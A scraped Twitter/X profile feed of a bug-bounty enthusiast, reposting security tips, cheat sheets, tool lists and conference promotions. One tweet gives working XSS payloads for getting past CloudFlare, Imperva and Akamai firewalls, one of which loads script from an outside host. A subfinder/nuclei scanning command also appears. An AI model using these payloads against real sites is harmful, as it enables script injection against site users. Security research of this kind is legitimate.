manojxshrestha Profile Banner
Manoj Shrestha Profile
Manoj Shrestha

@manojxshrestha

Followers
10
Following
45
Media
3
Statuses
30

i convert caffeine and curiosity into code!!

Joined January 2022
Don't wanna be here? Send us removal request.
@fattselimi
Fat
2 years
You choose oneliners for your Bug Bounty hunting i choose Manual hunting we are not the same #bugbounty #bugbountylife
8
6
55
@KN0X55
KNOXSS
2 months
#XSS #WAF #Bypass ➡️ CloudFlare <Img Src=OnXSS OnError=(alert)(1)> ➡️ Imperva <Image Src=//X55.is OnLoad%0C=import(Src)// ➡️ Akamai <A Href AutoFocus %252F="/"OnFocus=k='t',top['aler'%2Bk](1)> Sign up for free Blind XSS! https://t.co/3sWDgbdEN9 - built for pros. #WebAppSec
3
52
299
@DarkWebInformer
Dark Web Informer
2 months
Web Check: All-in-one OSINT tool for analysing any website GitHub: https://t.co/ZYRuL02rNk Link: https://t.co/JwPhy9Si5e
Tweet media one
Tweet media two
3
197
983
@Shubham_pen
Shubham Sharma
4 months
Tweet media one
3
44
232
Subdomain Takeover Detection with Subfinder & Nuclei -new wordpress takeover detection for nuclei template subfinder -d target -o target && nuclei -t wp-xyz-takeover[.]yaml -l target #bugbountytips #bugbounty https://t.co/RY9pV1Wkcl
Tweet media one
Tweet media two
Tweet media three
Tweet media four
0
69
253
🧠 Advanced Linux Privilege Escalation Guide (2025 Edition) 🔍 1. Comprehensive Enumeration Effective privilege escalation begins with thorough enumeration. Utilize both manual commands and automated tools to gather detailed system information: •Manual Commands: •id, whoami,
2
9
44
@NahamSec
Ben Sadeghipour
4 months
🎉 Hyped for #NahamCon2025! ✨ Day 1: Full AI x Offensive Security track with @jhaddix, @rez0__ , @DanielMiessler,@wunderwuzzi23, @monkehack, @xssdoctor. Details: https://t.co/ITnfcK3NQc #InfoSec #bugbounty #CyberSecurity
Tweet media one
8
37
259
@5mukx
Smukx.E
4 months
Certified Red Team Professional (CRTP) Notes. https://t.co/yKjLrFsBY3
Tweet media one
3
108
502
@harshleenchawl2
Harshleen Chawla
5 months
CISSP CHEATSHEET👾📝
Tweet media one
Tweet media two
Tweet media three
Tweet media four
5
141
694
@harshleenchawl2
Harshleen Chawla
5 months
OSCP Enumeration Cheat Sheet📝🔥 🔗 https://t.co/YEvzzRaACu
Tweet media one
1
86
472
@mqst_
Muqsit 𝕏
5 months
⛏ A detailed guide on how to use Ghidra to Reverse Engineer Malware Blog: https://t.co/fpKPw9dsSF #reverseengineer #infosec
Tweet media one
Tweet media two
0
69
266
@HackenProof
HackenProof
5 months
Bug hunter after his 10th duplicate report in a month
9
27
194
@HackenProof
HackenProof
7 months
Or at least HIGH…
Tweet media one
5
23
138
@harshleenchawl2
Harshleen Chawla
1 year
List of bug hunting tools: 1. Burp Suite 🐛 2. OWASP ZAP (Zed Attack Proxy) 🛡️ 3. Nmap 🌐 4. Metasploit 🛠️ 5. Wireshark 🖥️ 6. Nikto 🕵️‍♂️ 7. SQLMap 🗺️ 8. Acunetix 🕷️ 9. Nessus 🚀 10. OpenVAS 🚪 11. BeEF (Browser Exploitation Framework) 🐄 12. Shodan 🔍 13. Wfuzz 🌀 14. DirBuster
6
58
280
@coffinxp7
Coffin
10 months
our loxs tool detected total 42 Cloudflare bypass payloads isn't it cool :) https://t.co/nfSEd5bdzT
Tweet media one
21
110
556